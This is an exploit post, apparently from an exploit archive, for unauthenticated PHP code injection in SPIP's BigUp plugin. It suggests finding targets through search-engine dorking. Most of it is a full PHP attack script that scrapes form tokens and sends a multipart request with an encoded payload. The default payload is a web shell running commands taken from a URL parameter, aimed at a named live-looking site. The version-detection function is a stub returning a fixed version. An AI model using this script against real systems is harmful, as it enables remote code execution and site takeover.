SPIP BigUp 4.2.15 Code Injection

`=============================================================================================================================================  
| # Title : SPIP BigUp 4.2.15 php code injection Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |  
| # Vendor : https://www.spip.net/ |  
=============================================================================================================================================  
  
poc :  
  
[+] Dorking İn Google Or Other Search Enggine.  
  
[+] This exploits a php code injection vulnerability in the BigUp plugin of SPIP.  
The vulnerability lies in the lister_fichiers_par_champs function, which is triggered when the bigup_retrouver_fichiers parameter is set to any value.   
By exploiting the improper handling of multipart form data in file uploads, an attacker can inject and execute arbitrary PHP code on the target server.   
It allows unauthenticated users to execute arbitrary code remotely via the public interface.   
  
  
[+] Line 143 : Set your target & payload .  
  
[+] Save Payload as poc.php and run from cmd = C:\www\test>php poc.php  
  
[+] Payload :  
  
<?php  
class indoushka {  
private $targetUri;  
private $formPage;  
private $payload;  
  
public function __construct($targetUri, $formPage = 'auto', $payload) {  
$this->targetUri = $targetUri;  
$this->formPage = $formPage;  
$this->payload = $payload;  
}  
  
public function check() {  
$spipVersion = $this->getSpipVersion();  
if (!$spipVersion) {  
return "Unable to determine the version of SPIP.";  
}  
echo "SPIP Version detected: " . $spipVersion . "\n";  
  
$vulnerableRanges = [  
['start' => '4.0.0', 'end' => '4.1.17'],  
['start' => '4.2.0', 'end' => '4.2.15'],  
['start' => '4.3.0', 'end' => '4.3.1']  
];  
  
$isVulnerable = false;  
foreach ($vulnerableRanges as $range) {  
if (version_compare($spipVersion, $range['start'], '>=') && version_compare($spipVersion, $range['end'], '<=')) {  
$isVulnerable = true;  
break;  
}  
}  
  
if (!$isVulnerable) {  
return "The detected SPIP version ($spipVersion) is not vulnerable.";  
}  
  
echo "SPIP version $spipVersion is vulnerable.\n";  
return "SPIP version $spipVersion is vulnerable.";  
}  
  
private function getSpipVersion() {  
// This function should make an HTTP request to detect the SPIP version  
// Return the version or false if undetectable  
return '4.3.1'; // Example version, replace with actual logic  
}  
  
private function getFormData() {  
$pages = ['login', 'spip_pass', 'contact'];  
  
if ($this->formPage !== 'auto') {  
$pages = [$this->formPage];  
}  
  
foreach ($pages as $page) {  
$url = $this->normalizeUri($page);  
$response = $this->sendRequest('GET', $url);  
  
if ($response['status'] === 200) {  
libxml_use_internal_errors(true); // Prevent warnings from invalid HTML  
$doc = new DOMDocument();  
@$doc->loadHTML($response['body']);  
libxml_clear_errors();  
  
$inputs = $doc->getElementsByTagName('input');  
if ($inputs->length > 1) {  
$action = $inputs->item(0)->getAttribute('value');  
$args = $inputs->item(1)->getAttribute('value');  
  
if ($action && $args) {  
echo "Found formulaire_action: $action\n";  
echo "Found formulaire_action_args: " . substr($args, 0, 20) . "...\n";  
return ['action' => $action, 'args' => $args];  
}  
}  
}  
}  
  
return null;  
}  
  
private function normalizeUri($page) {  
return rtrim($this->targetUri, '/') . '/' . ltrim($page, '/');  
}  
  
private function sendRequest($method, $url, $data = null) {  
$ch = curl_init();  
  
curl_setopt($ch, CURLOPT_URL, $url);  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  
  
if ($method === 'POST' && $data) {  
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);  
curl_setopt($ch, CURLOPT_HTTPHEADER, [  
'Content-Type: multipart/form-data; boundary=' . substr($data, 2, 32)  
]);  
}  
  
$response = curl_exec($ch);  
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);  
  
curl_close($ch);  
  
return ['status' => $httpCode, 'body' => $response];  
}  
  
private function encodePayload() {  
return base64_encode($this->payload);  
}  
  
public function exploit() {  
$formData = $this->getFormData();  
if (!$formData) {  
echo "Could not retrieve formulaire_action or formulaire_action_args value from any page.\n";  
return;  
}  
  
echo "Preparing to send exploit payload to the target...\n";  
  
$encodedPayload = $this->encodePayload();  
$boundary = '----WebKitFormBoundary' . bin2hex(random_bytes(16));  
  
$postData = "--$boundary\r\n";  
$postData .= 'Content-Disposition: form-data; name="formulaire_action"' . "\r\n\r\n" . $formData['action'] . "\r\n";  
$postData .= "--$boundary\r\n";  
$postData .= 'Content-Disposition: form-data; name="bigup_retrouver_fichiers"' . "\r\n\r\n" . $this->randomString() . "\r\n";  
$postData .= "--$boundary\r\n";  
$postData .= 'Content-Disposition: form-data; name="' . $this->randomString() . '[".base64_decode(\'' . $encodedPayload . '\').die()."]"; filename="' . $this->randomString() . '"' . "\r\n\r\n\r\n";  
$postData .= "--$boundary\r\n";  
$postData .= 'Content-Disposition: form-data; name="formulaire_action_args"' . "\r\n\r\n" . $formData['args'] . "\r\n";  
$postData .= "--$boundary--\r\n";  
  
$this->sendRequest('POST', $this->normalizeUri('spip.php'), $postData);  
}  
  
private function randomString($length = 8) {  
return bin2hex(random_bytes($length / 2));  
}  
}  
  
// Usage example:  
$exploit = new indoushka('https://yonnelautre.fr/', 'auto', '<?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>');  
$exploit->check();  
$exploit->exploit();  
?>  
  
  
Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================  
`